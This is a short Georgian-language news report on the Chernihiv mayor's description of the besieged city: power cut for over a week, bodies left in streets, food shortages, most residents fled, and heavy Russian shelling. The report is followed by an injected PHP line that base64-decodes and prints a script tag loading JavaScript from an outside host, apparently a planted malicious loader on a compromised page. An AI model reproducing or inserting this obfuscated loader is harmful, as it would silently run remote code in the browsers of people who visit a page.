celsiusi
ავერსი საქკაბელი
ჩერნიგოვის მერის ვლადისლავ არტოშენკოს განცხადებით, ჩერნიგოვში ჰუმანიტარული კატასტროფაა, გათიშულია ელექტროენერგია. ცხედრები საათობით ასვენია ქუჩებში. 
 
როგორც ქალაქის მერმა „უკრაინსკაია პრავდას“ განუცხადა, ხშირია შემთხვევები, როდესაც  ცხედრები საათობით რჩება ქუჩებში, რადგან შეუძლებელია მორგთან დაკაშირება და მათი გადასვენება.
 
„კვირაზე მეტია, არ გვაქვს ელექტროენერგია. იმის საშუალებაც არ არის, რომ აღვადგინოთ მისი მოწოდება. ამის საშუალება რომ გვქონდეს, ელექტროენერგია მხოლოდ ერთი-ორი საათის მანძილზე იქნება. ხშირია შემთხვევები, როდესაც დაბომბვების შედეგად, გარდაცვლილთა ცხედრები საათობით რჩება ქუჩებში, რადგან შეუძლებელია მორგთან დაკაშირება და მათი გადასვენება. ბევრმა ადამიანმა დაკარგა სამსახური და საშუალება არ აქვთ, საკვები შეიძინონ. გარდა ამისა, მაღაზიებში ასორტიმენტი იკლებს, რადგან ქალაქში პროდუქტის მიწოდება, ფაქტობრივად, არ ხდება. ასევე, არ არსებობს შესაძლებლობა პროდუქტების შესანახად. ადამიანები იძულებულები არიან საკვები საგანგებო ვითარებაში მოამზადონ. ეს განსაკუთრებით მძიმეა მუდმივი დაბომბვების გამო. აქაც არსებობს ანტისანიტარიის საკითხი“, - განაცხადა არტოშენკომ.
 
მისი ინფორმაციით, ქალაქი უკვე დატოვა მოსახლეობის ნახევარზე მეტმა. ძირითადად, ის ადამიანები რჩებიან, ვისაც ზრუნვა ესაჭიროება და წასასვლელი არსად აქვთ.
 
მერის თქმით, ქალაქის ხელმძღვანელობას განსაკუთრებულად უჭირს არსებულ გამოწვევებთან გამკლავება, ასევე ადამიანებისთვის დახმარების გაწევა, ვისაც არ შეუძლია თავისთვის საკვების, წყლის და მედიკამენტების მიტანა.
 
„რუსეთის არმიის მიერ დაბომბვების რაოდენობამ ბოლო დღეებში განსაკუთრებულად იმატა. ისინი სრულიად ქაოტურად ისვრიან, რაც მიმართულია ადამიანთა კიდევ მეტად დასაშინებლად“, - განაცხადა ქალაქის მერმა.
 
მისი თქმით, ახლა აზრი არ აქვს დანგრეული შენობების დათვლას, რადგან მათი რაოდენობა საათობრივად იზრდება.
750
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");